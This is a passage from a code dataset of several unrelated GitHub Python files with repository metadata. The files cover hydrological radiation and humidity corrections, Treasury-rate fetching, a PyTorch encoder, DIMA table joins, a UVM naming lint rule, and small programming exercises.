np.zeros_like(Rsin)\n #Winter\n kd = np.where((sunset < 1.4208) & (kt < 0.715),\n 1.0 - 0.2727 * kt + 2.4495 * np.power(kt, 2) - 11.9514 * np.power(kt, 3) + 9.3879 * np.power(kt, 4), kd)\n kd = np.where((sunset < 1.4208) & (kt >= 0.715),\n 0.143, kd)\n\n #Summer\n kd = np.where((sunset >= 1.4208) & (kt < 0.722),\n 1.0 + 0.2832 * kt - 2.5557 * np.power(kt, 2) + 0.8448 * np.power(kt, 3), kd)\n kd = np.where((sunset >= 1.4208) & (kt >= 0.722),\n 0.175, kd)\n\n Rd_rsky = kd * Rsin\n Rb_rsky = (1-kd) * Rsin\n\n #Calculate clearsky beam and diffuse indices based on gridded data resolution r.sun clearsky beam and diffuse maps\n Rd_clrflat = 'Rdflat_' + day.strftime('%j') + '.tif'\n Rb_clrflat = 'Rbflat_' + day.strftime('%j') + '.tif'\n\n resX, resY, cols, rows, LinkeLong, LinkeLat, Rd_flat, FillVal = readMap((os.path.join(path, flatdir, Rd_clrflat)), 'Gtiff', logger)\n resX, resY, cols, rows, LinkeLong, LinkeLat, Rb_flat, FillVal = readMap((os.path.join(path, flatdir, Rb_clrflat)), 'Gtiff', logger)\n\n # Rb_flat = flipud(Rb_flat.mean(axis=0))\n # Rd_flat = flipud(Rb_flat.mean(axis=0))\n #\n # Rb_flat = resample_grid(Rb_flat, ncstepobj.lon, ncstepobj.lat, highResLon, highResLat, method=\"linear\", FillVal=FillVal)\n # Rd_flat = resample_grid(Rb_flat, ncstepobj.lon, ncstepobj.lat, highResLon, highResLat, method=\"linear\", FillVal=FillVal)\n\n #Calculate Beam and Diffuse clear-sky indices for flat radiation\n Kdif = np.maximum(np.minimum(Rd_rsky / Rd_flat,1),0.0001)\n Kbeam = np.maximum(np.minimum(Rb_rsky / Rb_flat,1),0.0001)\n\n #Read in topographically-adjusted DEM scale clear-sky beam and diffuse radiation\n Rd_clrDEM = 'Rd_' + day.strftime('%j') + '.tif'\n Rb_clrDEM = 'Rb_' + day.strftime('%j') + '.tif'\n\n resX, resY, cols, rows, LinkeLong, LinkeLat, Rd_DEM, FillVal = readMap((os.path.join(path, topoDEM, Rd_clrDEM)), 'Gtiff', logger)\n resX, resY, cols, rows, LinkeLong, LinkeLat, Rb_DEM, FillVal = readMap((os.path.join(path, topoDEM, Rb_clrDEM)), 'Gtiff', logger)\n\n logger.info(\"Reading clear-sky daily solar radiation:\")\n\n #Sum and Scale topographically-adjusted clear-sky beam and diffuse components using Kbeam, Kdif clear-sky indices\n\n Rg_DEM = Rd_DEM * Kdif + Rb_DEM * Kbeam\n\n FillVal = 0\n Rg_DEM[Rsin < 0.0] = FillVal\n Rg_DEM[Rsin == 0.0] = 0.00001\n Rg_DEM[isinf(Rsin)] = FillVal\n\n return Rg_DEM, rtoa\n\n\ndef correctPres(relevantDataFields, highResDEM, resLowResDEM, FillVal=1E31):\n \"\"\"\n Correction of air pressure for DEM based altitude correction based on barometric formula\n\n :param relevantDataFields:\n :param Pressure:\n :param highResDEM:\n :param resLowResDEM:\n :return: corrected pressure\n\n relevantDataFields : ['Temperature','DownwellingLongWaveRadiation','SurfaceAtmosphericPressure',\\\n 'NearSurfaceSpecificHumidity','SurfaceIncidentShortwaveRadiation','NearSurfaceWindSpeed']\n \"\"\"\n\n Tmax = relevantDataFields[0]\n Tmin = relevantDataFields[1]\n Tmean = (Tmin + Tmax) / 2\n\n g = 9.801 # gravitational constant [m s-2]\n R_air = 8.3144621 # specific gas constant for dry air [J mol-1 K-1]\n # R = 287 # gas constant per kg air [J kg-1 K-1]\n Mo = 0.0289644 # molecular weight of gas [g / mol]\n lapse_rate = 0.0065 # lapse rate [K m-1]\n Pressure = 101300 # Atmospheric pressure at sea-level [Pa]\n\n # Why is this, switched off for now...\n # highResDEM = np.maximum(0,highResDEM)\n\n # Pressag = pcr.numpy2pcr(Scalar, Pressure, 0.0)\n # aguila(Pressag)\n\n Pres_corr = np.zeros_like(highResDEM)\n # Incorrect without pressure at METDATA elevation\n # Pres_corr = ne.evaluate(\"Pressure *( (Tmean/ ( Tmean + lapse_rate * (highResDEM))) ** (g * Mo / (R_air * lapse_rate)))\")\n Pres_corr = ne.evaluate(\"101300 *( (293.0 - lapse_rate * (highResDEM)) / 293.0) ** (5.26)\")\n\n Pres_corr[isnan(Pres_corr)] = FillVal\n Pres_corr[isinf(Pres_corr)] = FillVal\n Pres_corr[Pres_corr > 150000] = FillVal\n\n return Pres_corr\n\n\n# @profile\ndef correctQ_RH(relevantDataFields, Tmax, Tmin, highResDEM, resLowResDEM, mismask, FillVal=1E31):\n \"\"\"\n Constant Relative Humidity with elevation using datum specific humidity and temperature\n\n inputs:\n Temperature = daily mean, min or max temperature (degrees Celcius)\n Elevation correction = difference between high resolution and low resolution (4 km) DEM [m]\n\n relevantDataFields : ['MaxTemperature','MinTemperature','NearSurfaceSpecificHumidity',\\\n 'SurfaceIncidentShortwaveRadiation','SurfaceWindSpeed','Pressure','CorrectedSpecificHumidity']\n\n \"\"\"\n\n # constants:\n g = 9.81 # gravitational constant [m s-2]\n R_air = 8.3144621 # specific gas constant for dry air [J mol-1 K-1]\n Mo = 0.0289644 # molecular weight of gas [g / mol]\n lapse_rate = 0.006 # lapse rate [K m-1]\n eps = 0.622 # ratio of water vapour/dry air molecular weights [-]\n FillVal = 1E31\n R = 287.058 # Specific gas constant for dry air [J kg-1 K-1]\n rv = 461 # Specific gas constant for water vapor[J kg-1 K-1]\n eps = 0.622 # ratio of water vapour/dry air molecular weights (R / rv) [-]\n\n Temp_corr = (relevantDataFields[0] + relevantDataFields[1]) / 2\n Pres_corr = relevantDataFields[5]\n Q = relevantDataFields[2]\n # p_mb = relevantDataFields[5] / 1000\n Tmean = (Tmax + Tmin) / 2 # Original Tmean, Tmax without elevation lapse adjustment\n\n # saturation vapour pressure [Pa]\n es_ref = ne.evaluate(\"610.8*exp((17.27*(Tmean-273.15))/((Tmean-273.15)+237.3))\")\n es_elev = ne.evaluate(\"610.8*exp((17.27*(Temp_corr-273.15))/((Temp_corr-273.15)+237.3))\")\n es_elev[isinf(es_elev)] = FillVal\n ## tag = pcr.numpy2pcr(Scalar, es_ref, FillVal)\n ## aguila(tag)\n ## tags = pcr.numpy2pcr(Scalar, es_elev, FillVal)\n ## aguila(tags)\n\n # actual vapour pressure [Pa]\n ea_ref = ne.evaluate(\"-(Q*Pres_corr)/((eps-1)*Q-eps)\")\n ea_ref[mismask] = 0.0001\n ea_corr = ne.evaluate(\"(ea_ref / es_ref) * es_elev\") # Set actual vapor pressure equal to reference RH\n ea_corr[isinf(ea_corr)] = 0.0001\n ea_corr[isnan(ea_corr)] = 0.0001\n ea_corr[ea_corr <= 0] = 0.0001\n ea_corr[mismask] = 0.0001\n\n rh_corr = ne.evaluate(\"ea_corr / es_elev\")\n rh_corr[rh_corr < 0.0] = FillVal\n rh_org = ea_ref / es_ref\n\n return es_elev, ea_corr, rh_corr, rh_org\n\n\ndef arid_cor(Tmin, ea, logger):\n # Calculate dew point after correcting for constant RH at elevation for aridity correction\n\n ea_kPa = ea / 1000.0\n Tdew = (np.log(ea_kPa) + 0.49299) / (0.0707 - 0.00421 * np.log(ea_kPa)) # Shuttleworth, 2012 in degrees C; ea in kPA\n Tmin -= 273.15 # Convert from K to degrees C to compare\n\n # Check daily max difference between Tmin minus Tdew\n # Apply aridity correction where Tdew is > 2 degrees C less than Tmin and make Tdew equal to Tmin - 2\n\n # Read in NLCD agricultural areas (NLCD LC 82), NLCD 81 (Hay / Pasture), 90 (Woody Wetlands), 95 (Emergent Herbaceous Wetlands )\n # nlcd_nm_wgs84_AgWetlands_sm.tif (Includes 81, 82, 90, 95), 255 = no class\n path = 'DEM/'\n # NLCDAg_file = 'nlcd_nm_wgs84_Agfields_sm.tif'\n NLCDAg_file = 'nlcd_nm_wgs84_AgWetlands_sm.tif'\n resX, resY, cols, rows, LinkeLong, LinkeLat, NLCDAg, FillVal = readMap((os.path.join(path, NLCDAg_file)), 'Gtiff',\n logger)\n Tmindif = Tmin - Tdew\n\n Tdew_cor = Tdew\n Tdew_cor = where((NLCDAg != 255) & (Tmindif > 2),\n Tmin - 2.0, Tdew)\n\n ea_kPa_cor = 0.6108 * np.exp(17.27 * Tdew_cor / (Tdew_cor + 237.3)) # (ASCE, 2005): ea in kPa, ASCE in degrees C\n ea_cor = ea_kPa * 1000 # Convert kPa to Pa\n\n # Save Tdew correction difference to verify working\n Tdew_diff = Tmin - Tdew_cor\n\n return ea_cor, Tdew_diff\n\n\ndef Ra_daily(currentdate, lat):\n # CALCULATE EXTRATERRESTRIAL RADIATION\n # get day of year\n tt = currentdate.timetuple()\n JULDAY = tt.tm_yday\n # #Latitude radians\n LatRad = ne.evaluate(\"lat*pi/180.0\")\n # declination (rad)\n declin = ne.evaluate(\"0.4093*(sin(((2.0*pi*JULDAY)/365.0)-1.39))\")\n\n # sunset hour angle\n # arccosInput = ne.evaluate(\"-1*(tan(LatRad))*(tan(declin))\")\n arccosInput = -1 * (np.tan(LatRad)) * np.tan(declin)\n arccosInput = np.minimum(1, arccosInput)\n arccosInput = np.maximum(-1, arccosInput)\n sunangle = ne.evaluate(\"arccos(arccosInput)\") #Sunset hour angle (rads)\n # # distance of earth to sun\n distsun = ne.evaluate(\"1+0.033*(cos((2*pi*JULDAY)/365.0))\")\n # Ra = water equivalent extra terrestiral radiation in MJ day-1\n rtoa = ne.evaluate(\"((24 * 60 * 0.082) / 3.14) * distsun * (sunangle*(sin(LatRad))*(sin(declin))+(cos(LatRad))*(cos(declin))*(sin(sunangle)))\")\n rtoa[rtoa < 0] = 0\n # Raag = numpy2pcr(Scalar, Ra, 0.0)\n # aguila(Raag)\n\n return rtoa, sunangle\n","repo_name":"NMTHydro/RefET","sub_path":"gadget_lib.py","file_name":"gadget_lib.py","file_ext":"py","file_size_in_byte":27956,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"31"} +{"seq_id":"10516243548","text":"\"\"\"\nGet economic data and store to local json file.\n\"\"\"\n# %% codecell\n############################################################\nimport os\nimport json\nfrom json import JSONDecodeError\nfrom io import StringIO, BytesIO\nimport glob\nimport importlib\nimport sys\nimport cProfile\n\nimport os.path\n\nimport pandas as pd\nimport numpy as np\nimport requests\nfrom dotenv import load_dotenv\nfrom pathlib import Path\n\nimport datetime\nfrom datetime import date, timedelta, time\n\nfrom yahoofinancials import YahooFinancials\n\ntry:\n from scripts.dev.data_collect.options import DerivativeExpirations, DerivativesHelper\n from scripts.dev.multiuse.help_class import baseDir, dataTypes, getDate, write_to_parquet\n\nexcept ModuleNotFoundError:\n from data_collect.options import DerivativesHelper, DerivativesStats\n from multiuse.help_class import baseDir, dataTypes, getDate, write_to_parquet\n\n importlib.reload(sys.modules['data_collect.options'])\n importlib.reload(sys.modules['multiuse.help_class'])\n\n from data_collect.options import DerivativesHelper, DerivativesStats\n from multiuse.help_class import baseDir, dataTypes, getDate\n\n# %% codecell\n############################################################\n\"\"\"\nGet the last year of 3-month T bill rates (risk free).\nWrite function to find the most recent date and then get all data in\nbetween today and that day.\n\"\"\"\n# %% codecell\n############################################################\n\nclass yahooTbills():\n \"\"\"Get current price for US T-bills - 3 month, 5 yr, 10 yr, 30 yr.\"\"\"\n # 4 am to 8 pm, every hour\n tickers = ['^IRX', '^FVX', '^TNX', '^TYX']\n # cols = ['3mo', '5yr', '10yr', '30yr', 'time']\n\n def __init__(self):\n self.get_path(self)\n self.df = self.get_data(self)\n self.write_to_parquet(self)\n\n def get_path(cls, self):\n \"\"\"Get local fpath.\"\"\"\n self.fpath = f\"{baseDir().path}/economic_data/treasuries.parquet\"\n # Create an empty data frame with column names\n df = pd.DataFrame(columns=self.tickers)\n # Check if local data frame already exists\n if os.path.isfile(self.fpath):\n df = pd.read_parquet(self.fpath)\n # Return data frame\n self.df = df\n\n def get_data(cls, self):\n \"\"\"Get data from yahoo finance.\"\"\"\n treasuries = YahooFinancials(self.tickers)\n tdata = treasuries.get_current_price()\n\n # Add current timestamp\n tdata['time'] = datetime.datetime.now()\n # Append data to existing data frame\n df = self.df.append(tdata, ignore_index=True)\n\n \"\"\"\n # Remove time from columns for data conversion\n try:\n self.cols.remove('time')\n except ValueError:\n pass\n # Convert cols to float 16s\n df[self.cols] = df[self.cols].astype(np.float16)\n \"\"\"\n df.reset_index(inplace=True, drop=True)\n\n return df\n\n def write_to_parquet(cls, self):\n \"\"\"Write data to local json file.\"\"\"\n write_to_parquet(self.df, self.fpath)\n\n\n# %% codecell\n############################################################\n\n\ndef get_tdata(payload, base_url):\n \"\"\"Get tdata from IEX with specified range.\"\"\"\n # 3 month risk free rate\n symbol = \"DGS3MO\"\n tdata = requests.get(\n f\"{base_url}/time-series/treasury/{symbol}\",\n params=payload # Passed through function arg\n )\n print(f\"Trying to get new data with the parameters {payload}\")\n new_tdata = pd.json_normalize(json.loads(tdata.content))\n new_tdata['dt_date'] = pd.to_datetime(new_tdata['date'], unit='ms')\n return new_tdata\n\n\ndef read_tdata():\n \"\"\"Read local data or get if not available.\"\"\"\n load_dotenv()\n base_url = os.environ.get(\"base_url\")\n\n # Load base_directory (derivatives data)\n base_dir = f\"{Path(os.getcwd()).parents[0]}/data/economic_data\"\n choices = glob.glob(f\"{base_dir}/*\")\n fname = f\"{base_dir}/risk_free_daily.parquet\"\n\n if fname in choices: # If file is saved locally\n tdata_df = pd.read_parquet(fname)\n\n # Most recent date in local data\n try:\n mr_date = tdata_df['dt_date'].max().date()\n except AttributeError:\n mr_date = pd.to_datetime(tdata_df['dt_date'], unit='ms').max().date()\n # Most recent available date to get data from\n mr_avail_date = DerivativesHelper.which_fname_date()\n\n # If there is new data available, get it\n if mr_date < mr_avail_date:\n print('Most recent date is less that the most recent available date')\n # Define the payload to be used\n payload = {'token': os.environ.get(\"iex_publish_api\"),\n 'from': mr_date.strftime(\"%Y-%m-%d\"), # YYYY-MM-DD\n 'to': mr_avail_date.strftime(\"%Y-%m-%d\")} # YYYY-MM-DD\n # Get tdata from IEX cloud\n new_tdata = get_tdata(payload, base_url)\n # Combine new and old data\n tdata_df = pd.concat([tdata_df, new_tdata])\n # Reset index and drop\n tdata_df.reset_index(drop=True, inplace=True)\n # Write to local json file\n write_to_parquet(tdata_df, fname)\n\n else: # If no data is saved locally, get the ytd data\n # Define the payload and range\n payload = {'token': os.environ.get(\"iex_publish_api\"), 'range': 'ytd'}\n # Get tdata from IEX cloud\n print('local data does not exist')\n tdata_df = get_tdata(payload, base_url)\n # Write to local json file\n write_to_parquet(tdata_df, fname)\n\n return tdata_df\n","repo_name":"webclinic017/algotrading-20","sub_path":"data_collect/yahoo_treasuries.py","file_name":"yahoo_treasuries.py","file_ext":"py","file_size_in_byte":5585,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"37305447828","text":"import torch.nn as nn\nimport numpy as np\nimport os\nimport sys\nfrom modules import Conv, Dense\n\n\nclass Encoder(nn.Module):\n def __init__(self, in_dim, hid_dim, enc_dim):\n super().__init__()\n self.conv_pre = Conv(layers=2, stride=1, kernel=3, hid_dim = hid_dim, in_dim=in_dim)\n self.conv_strided = Conv(layers=1, stride=2, kernel=4, hid_dim = hid_dim, residual=False)\n self.conv_post = Conv(layers=2, stride=1, kernel=3, hid_dim = hid_dim)\n self.dense = Dense(layers=4, hid_dim=hid_dim)\n self.out = nn.Linear(in_features=hid_dim, out_features=enc_dim)\n\n def forward(self, x):\n x = self.conv_pre(x)\n #print(\"Before stride:\",x.shape)\n x = self.conv_strided(x)\n #print(\"After stride:\",x.shape)\n x = self.conv_post(x)\n #print(\"Conv after stride:\", x.shape)\n x = x.permute(0,2,1)\n x = self.dense(x)\n x = self.out(x)\n out = x.permute(0, 2, 1)\n #print(\"output shape:\", out.shape)\n return out","repo_name":"anuragkumar95/VQ-VAE-ASR","sub_path":"encoder.py","file_name":"encoder.py","file_ext":"py","file_size_in_byte":1014,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"6992236029","text":"from src.utils.arcnah import arcno\nimport pandas as pd\nfrom src.projects.dima.tabletools import fix_fields\nimport platform\n\ndef lpi_pk(dimapath):\n \"\"\"\n returns a dataframe with tblplots, tbllines, tbllpiheader and tblLPIDetail\n joined. PrimaryKey field is made using formdate and plotkey\n\n \"\"\"\n\n lpi_header = arcno.MakeTableView('tblLPIHeader', dimapath)\n lpi_detail = arcno.MakeTableView('tblLPIDetail', dimapath)\n lines = arcno.MakeTableView('tblLines', dimapath)\n plots = arcno.MakeTableView('tblPlots', dimapath)\n\n # joins\n\n plot_line = pd.merge(plots, lines, how=\"inner\", on=\"PlotKey\")\n plot_line.LineKey\n lpihead_detail = pd.merge(lpi_header, lpi_detail, how=\"inner\", on=\"RecKey\")\n len(lpihead_detail.PointLoc.unique())\n\n plot_line_det = pd.merge(plot_line, lpihead_detail, how=\"inner\", on=\"LineKey\")\n plot_line_det.loc[:,['FormDate',\"RecKey\", \"LineKey\"]]\n arc = arcno()\n #\n # tmp1 = fix_fields(plot_line_det, 'DateModified').copy()\n # tmp2 = fix_fields(tmp1,'ElevationType').copy()\n plot_line_det.FormDate = pd.to_datetime(plot_line_det.FormDate) if platform.system()=='Linux' else plot_line_det.FormDate\n plot_pk = arc.CalculateField(plot_line_det, \"PrimaryKey\", \"PlotKey\", \"FormDate\")\n # plot_pk.drop_duplicates([\"PrimaryKey\", \"PlotKey\", \"FormDate\"])\n\n return plot_pk\n","repo_name":"krstphrrr/ingesterv2","sub_path":"src/projects/dima/tables/lpipk.py","file_name":"lpipk.py","file_ext":"py","file_size_in_byte":1346,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"40847688421","text":"import sys\nfrom itertools import combinations\n\nN, M = map(int, sys.stdin.readline().split())\ncity = [list(map(int, sys.stdin.readline().strip().split()))\n for _ in range(N)]\n\ndef distance(y1, x1, y2, x2):\n return abs(y1-y2)+abs(x1-x2)\n\n# 집과 치킨집의 좌표를 저장\nhomes = []\nchickens = []\nfor i in range(N):\n for j in range(N):\n if city[i][j] == 1:\n homes.append((i, j))\n elif city[i][j] == 2:\n chickens.append((i, j))\n\n# 모든 집과 모든 치킨집 사이의 거리 구하기\nd = [[] for _ in range(len(homes))]\nfor idx, home in enumerate(homes):\n for chicken in chickens:\n d[idx].append(distance(*home, *chicken))\n\n\n# 치킨집 M개를 골랐을 때 각각의 거리의 합을 구하고 최소값을 저장\nMIN = 10**9\ncombis = combinations(range(len(chickens)), M)\nfor combi in combis:\n sum_ = 0\n tmp = [[] for _ in range(len(homes))]\n for i in range(len(homes)): # 모든 집에 대해 갱신\n tmp[i] = [d[i][j] for j in combi]\n min_ = [0] * len(homes)\n for i in range(len(homes)):\n min_[i] = min(tmp[i])\n \n sum_ = sum(min_)\n if sum_ < MIN:\n MIN = sum_\n\nprint(MIN)\n''' [review]\n설계:\nN, M이 그리 크지 않아서 브루트 포스로 풀릴듯?\n모든 집에 대해 각각의 치킨집 까지의 거리를 구하고\n치킨집 M개를 골랐을 때 거리의 합을 구하자.\n\n방법 1. 거리를 모두 구하고 치킨집을 선택해서 합 구하기\n방법 2. 치킨집 선택해서 거리를 구하고 합 구하기\n\n나는 방법 1로 했음.\n방법 2로 하는 경우 치킨집을 선택할 ��마다 거리를 다시 구해야해서\n시간 복잡도가 커짐.\n'''","repo_name":"euroversedev/BaekJoonOJ_Python","sub_path":"Implementation/15686.py","file_name":"15686.py","file_ext":"py","file_size_in_byte":1700,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"72195599127","text":"import pathlib\nimport typing\nfrom functools import partial\n\nimport toml\n\nfrom fate.util.lazy import lstr\n\n\nclass TomlStrValue:\n\n _as_str_ = ()\n\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n self.dump_funcs.update(self._dump_funcs_str_)\n\n @property\n def _dump_funcs_str_(self):\n return dict.fromkeys(self._as_str_, self._value_as_str_)\n\n def _value_as_str_(self, value):\n return self.dump_funcs[str](str(value))\n\n\nclass TomlTerse:\n\n class InlineTableFormatters(typing.NamedTuple):\n\n sep: typing.Iterable[str] = (', ', ' = ')\n close: typing.Iterable[str] = ('{ ', ' }')\n end: str = '\\n'\n\n def dump_inline_table_formatted(self, section,\n formatters=InlineTableFormatters(),\n recursive_formatters=None):\n \"\"\"Preserve inline table in its compact syntax instead of expanding\n into subsection.\n\n https://github.com/toml-lang/toml#user-content-inline-table\n\n Unlike the built-in `dump_inline_table`, seperators may be\n customized, for example to omit superfluous whitespace.\n\n Also unlike the built-in, keys are cast to str, rather than\n presumed to be this type.\n\n By default, configured formatting is not applied to nested\n dictionaries; these are dumped with formatting compatible to\n that of the built-in method (*not* specially \"formatted\").\n Specify argument `recursive_formatters=True` to apply formatting\n configured by `formatters` to nested dictionaries as well; or,\n use `recursive_formatters` to specify an alternative set of\n formatters.\n\n \"\"\"\n if not isinstance(section, dict):\n return str(self.dump_value(section))\n\n (\n (sep_item, sep_pair),\n (close0, close1),\n end,\n ) = formatters\n\n if hasattr(recursive_formatters, '__iter__'):\n dump_value = partial(self.dump_inline_table_formatted,\n formatters=recursive_formatters,\n recursive_formatters=True)\n elif recursive_formatters:\n dump_value = partial(self.dump_inline_table_formatted,\n formatters=formatters,\n recursive_formatters=True)\n else:\n dump_value = self.dump_inline_table_formatted\n\n values = (\n str(key) + sep_pair + dump_value(val)\n for (key, val) in section.items()\n )\n return close0 + sep_item.join(values) + close1 + end\n\n\nclass TomlLoggingEncoder(TomlTerse, TomlStrValue, toml.TomlEncoder):\n\n _as_str_ = (lstr, pathlib.PosixPath)\n\n\ntoml_logging_encoder = TomlLoggingEncoder()\n\ninline_formatters_terse = TomlLoggingEncoder.InlineTableFormatters(sep=(' ', '='),\n close=('', ''),\n end='')\n\nnested_formatters_terse = TomlLoggingEncoder.InlineTableFormatters(sep=(' ', '='),\n close=('{', '}'),\n end='')\n\n\ndef dump_structured_log_record(struct):\n return toml_logging_encoder.dump_inline_table_formatted(\n struct,\n inline_formatters_terse,\n nested_formatters_terse,\n )\n","repo_name":"internet-equity/fate","sub_path":"src/fate/util/log/encoder.py","file_name":"encoder.py","file_ext":"py","file_size_in_byte":3489,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"20707943387","text":"\"\"\"Derived class naming schema\n\n\"\"\"\n# Python Imports\nimport os\nimport re\n# Lintwork Imports\n# Draconian UVM imports\nfrom duvm import filters\n\n\nclass ClassnameSchema(filters.LineListener):\n \"\"\"Check for the naming of class should match with derived class\n UVM components/objects hash table for naming schema\n \"\"\"\n\n subscribe_to = [filters.BeginClassBroadcaster]\n\n scopedname_re = re.compile(r\"pkg::\\s*([^ \\#]+)\")\n baseclassname_re = re.compile(r\".*(base|top)_(.*)\")\n\n schema_dict = {\n \"uvm_env\": \"env_c\",\n \"uvm_agent\": \"agent_c\",\n \"uvm_monitor\": \"mon_c\",\n \"uvm_scoreboard\": \"sb_c\",\n \"uvm_sequence_item\": \"item_c\",\n \"uvm_sequencer\": \"sqr_c\",\n \"uvm_driver\": \"drv_c\",\n \"uvm_sequence\": \"seq_c\",\n \"uvm_sequence_base\": \"seq_c\",\n \"uvm_component\": None,\n \"uvm_object\": None,\n \"uvm_reg_adapter\": \"reg_adapter_c\",\n \"uvm_reg_block\": \"reg_block_c\",\n \"uvm_reg_cbs\": \"cb_c\"\n }\n\n def update_beginclass(self, line_no, line, match):\n derived_classname = match.group('name')\n base_classname = match.group('base')\n if base_classname in self.schema_dict:\n if self.schema_dict[base_classname] == None:\n return\n if not derived_classname.endswith(self.schema_dict[base_classname]):\n self.error(\n line_no, line,\n \"Derived class '{}' not ending with '{}'. Recommend using suffix '{}' as derived class for base class '{}'\"\n .format(derived_classname, self.schema_dict[base_classname], self.schema_dict[base_classname],\n base_classname))\n else:\n baseclassname_match = self.baseclassname_re.search(base_classname)\n if baseclassname_match:\n base_classname = baseclassname_match.group(2)\n\n scopename_match = self.scopedname_re.search(base_classname)\n if scopename_match:\n base_classname = scopename_match.group(1)\n\n if not derived_classname.endswith(base_classname):\n self.error(\n line_no, line,\n \"Derived class '{}' not ending with '{}'. Recommend using suffix '{}' as derived class for base class '{}'\"\n .format(derived_classname, base_classname, base_classname, base_classname))\n","repo_name":"Lightelligence/draconian_uvm","sub_path":"duvm/classname_schema.py","file_name":"classname_schema.py","file_ext":"py","file_size_in_byte":2398,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"36062487596","text":"import random\n\n# note that while range is exclusive, randint is inclusive\nrandom_number = random.randint(1, 10)\n\n# if the player guesses correctly, tell them they won\n# otherwise, tell them if they are too high or too low\n\nuser_number = int(input(\"Please guess a number \"))\n\nwhile random_number != user_number:\n\tif random_number < user_number:\n\t\tprint(\"You guessed too high!\")\n\t\tuser_number = int(input(\"Please guess a number from 1 and 10 \"))\n\telse:\n\t\tprint(\"You guessed too low!\")\n\t\tuser_number = int(input(\"Please guess a number \"))\nprint(\"You won!\")\nuser_input = input(\"Would you like to play again? Enter y or n: \")\nif user_input == \"y\":\n\tuser_number = int(input(\"Please guess a number from 1 to 10 \"))","repo_name":"falondarville/python-exercises","sub_path":"guess.py","file_name":"guess.py","file_ext":"py","file_size_in_byte":707,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"44246853120","text":"\n\"\"\"Escreva 3 programas em Python que resolva o seguinte problema:\nDado um vetor A de tamanho N com apenas números inteiros positivos, calcule o fatorial de cada um deles e armazene o resultado em um vetor B.\n\nPara calcular o fatorial, utilize a seguinte função:\n\n\n def fatorial(n):\n fat = n\n for i in range(n-1,1,-1):\n fat = fat * i\n return(fat)\n\n\nOs modos de desenvolver seu programa devem ser:\n\nsequencialmente (sem concorrência);\nusando o módulo threading com 4 threads;\nusando o módulo multiprocessing com 4 processos.\"\"\"\n\nimport sys\nimport time\nimport threading\nimport threading,time\n\nvector = [1, 2, 3, 4, 5, 6, 7, 8, 9, 10]\nvector_result = []\n\ndef factorial(n):\n fat = n\n for i in range(n-1,1,-1):\n fat = fat * i\n return(fat)\n\ndef append_threading(vector, factorial,vector_result):\n for n in vector:\n vector_result.append(factorial(n))\n\ndef main():\n try:\n size = len(vector)\n\n thread_0 = threading.Thread(target=append_threading, args=(vector[0:int(size/4)], factorial, vector_result))\n thread_0.start()\n\n thread_1 = threading.Thread(target=append_threading, args=(vector[int(size/4):int(size/3)], factorial, vector_result))\n thread_1.start()\n\n thread_2 = threading.Thread(target=append_threading, args=(vector[int(size/3):int(size/2)], factorial, vector_result))\n thread_2.start()\n\n thread_3 = threading.Thread(target=append_threading, args=(vector[int(size/2):size], factorial, vector_result))\n thread_3.start()\n\n thread_0.join()\n thread_1.join()\n thread_3.join()\n thread_3.join()\n\n print(\"Calculating factorials 4 threads...\")\n print(\"Original vector: {}\".format(vector))\n print(\"Factorial vector: {}\".format(vector_result))\n except Exception as e:\n print(e)\n\nif __name__ == \"__main__\":\n sys.exit(main())","repo_name":"msmagnanijr/edc-python","sub_path":"desenvolvimento_python_sistemas_operacionais_redes/at/exercise_08_b_threads.py","file_name":"exercise_08_b_threads.py","file_ext":"py","file_size_in_byte":1882,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"17893073756","text":"import setuptools\n\nwith open(\"README.md\", \"r\", encoding=\"utf-8\") as fh:\n long_description = fh.read()\n\nwith open(\"VERSION\", \"r\", encoding=\"utf-8\") as fh:\n version = fh.read()\n\nsetuptools.setup(\n name=\"lazyprint\",\n version=version,\n author=\"Hugo Viana\",\n author_email=\"hugosemianoviana@gmail.com\",\n description=\"Lazy python print utilities\",\n long_description=long_description,\n long_description_content_type=\"text/markdown\",\n url=\"https://github.com/hugo-viana/lazyprint\",\n project_urls={\n \"Bug Tracker\": \"https://github.com/hugo-viana/lazyprint/issues\",\n },\n classifiers=[\n \"Programming Language :: Python :: 3\",\n \"License :: OSI Approved :: MIT License\",\n \"Operating System :: OS Independent\",\n ],\n package_dir={\"\": \"src\"},\n packages=setuptools.find_packages(where=\"src\"),\n python_requires=\">=3.6\",\n)","repo_name":"hugo-viana/lazyprint","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":881,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"37592102471","text":"class Solution(object):\n def subsets(self, nums):\n \"\"\"\n :type nums: List[int]\n :rtype: List[List[int]]\n \"\"\"\n ans = []\n l = 0\n n = len(nums)\n nums.sort()\n # get all subsets of each length\n for l in range(n + 1):\n result = []\n self.get_sets(l, [], result, nums, 0, n)\n for x in result:\n ans.append(list(x))\n \n return ans\n \n # get subsets of a particular length from nums\n def get_sets(self, l, item, result, nums, start, n):\n if (l == len(item)):\n result.append(list(item))\n return\n if (l < len(item)):\n return\n for i in range(start, n):\n item.append(nums[i])\n self.get_sets(l, item, result, nums, i + 1, n)\n item.pop()\n","repo_name":"goelhardik/programming","sub_path":"leetcode/subsets/sol.py","file_name":"sol.py","file_ext":"py","file_size_in_byte":858,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"1377751338","text":"import torch\nimport numpy as np\nfrom sklearn.metrics import classification_report, confusion_matrix, average_precision_score\nfrom torch.utils.data import DataLoader\n\ndevice = torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\")\n\n\ndef validate(val_loader: 